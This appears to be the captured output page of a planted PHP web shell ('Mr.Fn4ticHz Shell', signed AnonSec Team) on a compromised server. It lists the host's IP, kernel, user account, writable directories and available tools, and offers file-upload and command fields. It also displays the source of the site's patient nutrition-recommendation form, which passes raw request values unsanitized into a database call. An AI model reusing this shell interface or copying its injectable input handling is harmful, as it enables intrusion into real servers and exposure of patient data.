Mr.Fn4ticHz Shell
Server IP : 162.240.98.243  /  Your IP : 18.221.230.76
Web Server : Apache
System : Linux server.bti.yaw.mybluehostin.me 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
User : btiyawmy ( 1003)
PHP Version : 7.2.34
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/btiyawmy/public_html/login.easenup.in/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     

Current File : /home/btiyawmy/public_html/login.easenup.in//Nutrition_Recommendation.php
<?php
session_start();
include("dbconnection.php");
require_once('../DBManager.php');
require_once('../patientmanager.php');
if(isset($_POST[Nutrition_Recommendation]))
{
 PatientManager::NutritionRecommendation("$_GET[prescriptionid]","$_GET[patientid]","$_POST[weight]","$_POST[Present_Nutritional]","$_POST[Nutritional_Status]","$_POST[Maintain_BP]","$_POST[Blood_Sugar]","$_POST[Reduce_Cholesterol]","$_POST[Energy]","$_POST[Protein]","$_POST[Fat]","$_POST[note]","$_POST[entered_by]");	
}
		
?>

        <form name="Nutrition_Recommendation" method="post">
           
                      <table id="example2" class="table table-bordered table-hover"> 
 
<h4 align='center'>Recommendation</h4>
<br>
<h5>Advised to</h5>
<table id="example2" class="table table-bordered table-hover">
    
    <tr><td><input type='checkbox' name='weight' value='Loose weight'></td><td><span>Loose weight</span></td> <td><input type='checkbox' name='weight' value='Gain weight'></td> <td><span>Gain weight</span></td></tr>
    
   
    <tr>
    <td ><input type='checkbox' name='Present_Nutritional' value='Maintain Present Nutritional Status'></td><td><span>Maintain Present Nutritional Status</span></td><td ></td></tr>
      <tr><td ><input type='checkbox' name='Nutritional_Status' value='To improve Nutritional Status'></td><td><span>To improve Nutritional Status</span></td> <td ><input type='checkbox' name='Maintain_BP' value='Maintain B.P. Within normal limits'></td><td><span>Maintain B.P. Within normal limits</span></td></tr>
      
            <tr><td ><input type='checkbox' name='Blood_Sugar' value='Maintain Blood Sugar Within normal limits'></td><td><span>Maintain Blood Sugar Within normal limits</span></td> <td ><input type='checkbox' name='Reduce_Cholesterol' value='Reduce Cholesterol/triglycerides within normal limits'></td><td><span>Reduce Cholesterol/triglycerides within normal limits</span></td></tr>
    
    </table>

<h5>Diet Recommended:</h5>
<table id="example2" class="table table-bordered table-hover">
    
    <tr><td width='50%'>Energy :</td><td width='50%'><input type='text' name='Energy' placeholder='Kcal/day'></td></tr>
<tr><td width='50%'>Protein :</td><td width='50%'><input type='text' name='Protein' placeholder='gm./day'></td></tr>
<tr><td width='50%'>Fat :</td><td width='50%'><input type='text' name='Fat' placeholder='gm./day'></td></tr>
<tr><td width='50%'>Note :</td><td width='50%'><textarea  name="note" rows="2" cols="70"></textarea></td></tr>
</table>

<input type="submit" name="Nutrition_Recommendation" id="Nutrition_Recommendation" value="Submit" />
    </form>
    <p>&nbsp;</p>

  
</body>
</html>

Anon7 - 2022
AnonSec Team